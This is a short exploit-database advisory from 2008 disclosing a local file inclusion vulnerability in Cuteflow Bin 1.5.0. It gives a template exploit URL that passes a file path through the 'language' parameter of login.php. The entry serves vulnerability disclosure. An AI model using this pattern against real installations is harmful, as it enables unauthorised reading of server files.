id: 2767
date: 03/22/2008
title: Cuteflow Bin 1.5.0 (login.php) Local File Inclusion Vulnerability
author: KnocKout
cves: 

=================================================================
Cuteflow Bin 1.5.0 (login.php) Local File Inclusion Vulnerability
=================================================================



###########################################
Cuteflow Bin v1.5.0 Local File Inclusion Vulnerability
##############################################
[+] Author : KnocKout
[+] Cyber-Warrior.org / Bug Researchers Group
[~] Special Thanks : CW ALL USERS / Mr.Freeman
==============================================
Script : Cuteflow Bin v1.5.0
Download : http://scripts.ringsworld.com/groupware-tools/cuteflow-bin-v150/
###############################################
Exploit : http://localsite/path/login.php?language=[LocalFile]
#################################################




#  0day.today [2023-03-22]  #